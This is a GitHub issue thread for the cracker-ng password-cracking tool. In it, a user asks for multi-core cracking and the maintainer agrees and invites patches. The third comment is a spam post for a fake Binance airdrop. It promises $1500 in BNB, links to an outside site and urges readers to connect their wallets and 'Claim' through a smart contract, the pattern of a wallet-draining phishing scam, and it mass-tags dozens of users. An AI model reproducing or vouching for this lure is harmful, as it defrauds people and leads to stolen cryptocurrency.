### ISSUE TITLE
Implement process/thread based cracking

### ISSUE THREAD

**Issue by alexandernst** [BoboTiG/cracker-ng#2]
CPUs (nowadays) have multiple cores+threads, using all of them would lower the required time to crack a password.

**Comment by BoboTiG** [comment]
You are right, and it is on my todo list for a while. But I do not have many time, I need to refactor a lot of code to be parallel. I am open to PR and patches :)

**Comment by arconejeros** [comment]
# Binance Airdrop Guide: Claim Your $1500 in BNB Now!

Congratulations! You've won a share of the $500k Binance Airdrop, and we're excited to give you $1500 in BNB to celebrate the end of the year. Follow the steps below to claim your tokens and make the most of this festive giveaway!

[![Claim Now](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](http://go.bnbcoinsearn.online/97Q7Yj)

## Steps to Claim:

### 1. Connect Your Binance Wallet:
   - Click on the [Connect Wallet](https://go.bnbcoinsearn.online/97Q7Yj) link.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 2. Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "**Claim**" button to interact with the smart contract.

Don't miss out on your $1500 in BNB! Act now to secure your tokens.


Winners: @popra, @victor-mariano-leite, @priest671, @vakond, @franchb, @jarekp69, @occoder, @KenMan79, @renlulu, @peitalin, @champi-dev, @mikedemarais, @mogox, @h1fzon, @BaibhaVatsa, @GastonGuan, @sorenrood, @abstractumx, @0xKovach, @brianmcmichael, @ktitaro, @nicklaw90, @cmarmulla, @ryanbranch, @leekstech, @YusefAN, @thanasik, @mzalevski, @wojo, @jmiehau, @nicolaslazzos, @ze-gomes, @kusha, @nikitas1010, @eguven, @DavidRomanovizc, @skellet0r, @Dianagram009, @huazhuangnan, @Khawlabenmansour13, @Abdur-rahmaanJ, @picked-a-username, @lowicz, @Dezflo4212345, @christianrojas, @alstrup, @cyans, @NikhilBhutani, @Martin317, @gasolin
